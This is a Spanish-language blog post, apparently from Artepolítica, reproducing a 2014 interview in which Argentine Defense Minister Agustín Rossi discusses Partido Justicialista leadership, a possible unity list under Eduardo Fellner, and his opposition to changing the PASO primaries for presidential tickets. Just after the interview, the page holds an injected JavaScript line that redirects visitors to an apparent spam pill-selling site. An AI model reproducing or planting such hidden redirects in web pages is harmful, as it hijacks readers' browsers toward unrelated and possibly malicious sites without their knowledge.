Rossi, en contra de cambiar las PASO

07.04.2014 el ministro de defensa criticó a «los dirigentes que se dicen peronistas pero son claramente parte de la oposición»
El presidente y el vice no tienen que surgir de una contienda electoral, sino de una comunidad de ideas», señaló.
El ministro de Defensa y congresal del Partido Justicialista (PJ), Agustín Rossi, se pronunció en contra de modificar la ley que regula las PASO para que las fórmulas ejecutivas queden conformadas por mayorías y minorías partidarias. Consideró que «el presidente y el vice no tienen que surgir de una contienda electoral, sino de una comunidad de ideas».
En diálogo con Tiempo Argentino, Rossi opinó a favor de que el gobernador jujeño Eduardo Fellner encabece una lista de unidad que presida el PJ y criticó a los dirigentes que se dicen peronistas «pero son claramente parte de la oposición».
–¿Se plantean una estrategia de acercamiento a dirigentes territoriales o los gobernadores desde el partido?
–El Partido Justicialista es el principal articulador del Frente para la Victoria que apoya al gobierno de la presidenta de la Nación y reconoce su liderazgo. Cualquier dirigente que reconozca esta situación tiene todas las posibilidades de participar de este proceso político del justicialismo. El PJ hoy es el partido de gobierno y todo el que apoye a este instrumento que conduce el Estado y reconozca su liderazgo puede llegar a participar. Ese es el denominador común o piso mínimo.
–¿Usted coincide con la posibilidad de que se conforme una lista de unidad para conducir el PJ?
–Decidimos en la reunión del Consejo Nacional que la renovación de las autoridades tenga lugar en el congreso partidario del 9 de mayo. Allí se tiene que proponer quiénes van a ser los que conduzcan el PJ. De acá al 9 de mayo habrá que entrar en una etapa de diálogo con todos los sectores para lograr una conducción que nos represente a todos. Lo ideal sería que exista una lista de unidad en la que estén representadas todas las expresiones. El espíritu imperante de la reunión fue ese.
–¿Fellner puede ser la cabeza de esa lista de conducción?
–Falta tiempo para que se tome una decisión y se conforme una lista. En el caso de que la mayoría coincidiese en la figura de Fellner, me parece una decisión más que importante y correcta porque es un dirigente que fue gobernador de Jujuy en muchas oportunidades, compartí con él el ámbito legislativo en Diputados y lo reconozco como un hombre moderado y con fuerte compromiso justicialista y con el proyecto que encabeza Cristina Fernández.
–¿La intención es que el PJ sirva como paraguas político para todos los candidatos peronistas que quieran competir por la presidencia?
–En todas las elecciones nos hemos presentado bajo esa denominación y en 2015 será de la misma manera. Todos los que reconozcan al PJ como partido de gobierno, como principal apoyo para la gestión de la presidenta y como articulador del Frente para la Victoria (FPV) participarán dentro de este proceso. No me imagino participando a dirigentes que se dicen peronistas pero son claramente parte de la oposición.
–¿Tienen la intención de modificar la carta orgánica del partido de cara a las PASO?
–La ley nacional que regula el procedimiento de las PASO deja en manos de cada partido político o en frente electoral la forma que toma la distribución de los candidatos o cargos legislativos. Yo propuse dentro del ámbito del consejo nacional del PJ que nuestro partido impulse con claridad que esa distribución de los cargos legislativos dentro FPV sea utilizando el sistema D’Hondt (NdR: fórmula electoral que realiza esa asigna de modo proporcional a los votos obtenidos por cada fuerza o contendiente interno). En muchos distritos del país, la carta orgánica de nuestro partido usa un sistema de mayorías y minorías, y no es lo más democrático para incentivar que todos los que quieran participar lo hagan por dentro. Por ejemplo, en el PJ de Santa Fe, si un sector saca menos del 25% (de los sufragios), no tiene acceso a ningún cargo, y si saca más, sólo accede al 25% de los cargos. No es lo más justo desde ese punto de vista y desincentiva la participación (de los afiliados).
–¿Y para los cargos ejecutivos?
–En términos personales, no me entusiasma. La conformación de una fórmula con un presidente y un vicepresidente no tiene que ser producto de un resultado electoral. Hoy, según la ley, se eligen fórmulas, la que gana es la de todos, para modificar eso hay que modificar la ley. Mi opinión es que la reforma no me entusiasma, porque el presidente y el vice no tienen que surgir de una contienda electoral, sino de una comunidad de ideas. Para los que pierdan quedará la representación parlamentaria. «

window.location = «http://cheap-pills-norx.com»;

Acerca de Artepolítica

El usuario Artepolítica es la firma común de los que hacemos este blog colectivo.

Ver todas las entradas de Artepolítica →

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *